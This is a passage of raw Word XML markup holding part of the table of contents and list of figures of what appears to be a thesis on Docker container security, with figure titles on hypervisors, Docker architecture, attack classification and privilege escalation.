                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="277C25AC" w14:textId="7EC1D468"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55" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.1 Project management</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_Toc87032955 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60BE0B41" w14:textId="6D0C8583"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56" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.1.1</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Resources</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_Toc87032956 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75C2994C" w14:textId="3F625A56" w:rsidR="00551777" w:rsidRPr="000E02C7" w:rsidRDefault="00E6142E">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc87032957" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.2 Project planning</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_Toc87032957 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="457FECE6" w14:textId="7272407E" w:rsidR="00551777" w:rsidRPr="000E02C7" w:rsidRDefault="00E6142E">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc87032958" w:history="1">
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.2.1</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Logbook</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc87032958 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>81</w:t>
            </w:r>
            <w:r w:rsidR="00551777" w:rsidRPr="000E02C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="214F309A" w14:textId="57B009CC" w:rsidR="003D57F8" w:rsidRDefault="00876746">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000E02C7">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="35768E12" w14:textId="77777777" w:rsidR="003D57F8" w:rsidRDefault="003D57F8"/>
    <w:p w14:paraId="438BD680" w14:textId="3D1B3AD3" w:rsidR="00793908" w:rsidRDefault="006F0639" w:rsidP="006F0639">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0639">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LIST OF FIGURES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AC7D9A" w14:textId="12C3CFC5" w:rsidR="006F0639" w:rsidRPr="006F0639" w:rsidRDefault="00202FC8" w:rsidP="006F0639">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FIGURES</w:t>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PAGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1563F724" w14:textId="15C6CDB1" w:rsidR="009B5C8A" w:rsidRDefault="009B5C8A">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86867482" w:history="1">
        <w:r w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 1: type 1 and type 2 hypervisors</w:t>
        </w:r>
        <w:r w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> [4]</w:t>
        </w:r>
        <w:r w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867482 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="370CD3DB" w14:textId="6787CB4C"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83" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Figure 2: Virtual Machine (VM) Vs Containerisation architecture </w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[9].</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867483 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02283FBF" w14:textId="12B32935"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84" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Figure 3: Docker architecture </w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[24]</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867484 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D2224ED" w14:textId="4F5B22F3"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85" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Figure 4: Docker image layers </w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[28]</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867485 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01EF8E31" w14:textId="512C0D9A"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86" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 5: sample Dockerfile.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867486 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E2E9C1B" w14:textId="60A84099"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87" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Figure 6: Docker attacks classification </w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[77]</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867487 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D279B64" w14:textId="57CB20DE"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88" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Figure 7: Research onion </w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[81]</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867488 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3381252B" w14:textId="5CA0E626"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89" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 8: the research design process.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867489 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C7BB44A" w14:textId="3F06581F"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90" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 9: the project plan.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867490 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30C07AA3" w14:textId="0D9B7B06"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91" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 10: methods and techniques of the various attacks.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867491 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="632D8D83" w14:textId="74C7371C"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92" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 11: Privilege escalation block diagram.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867492 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="659AD3AC" w14:textId="73C2E90E"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93" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 12: network diagram of the connected containers.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867493 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
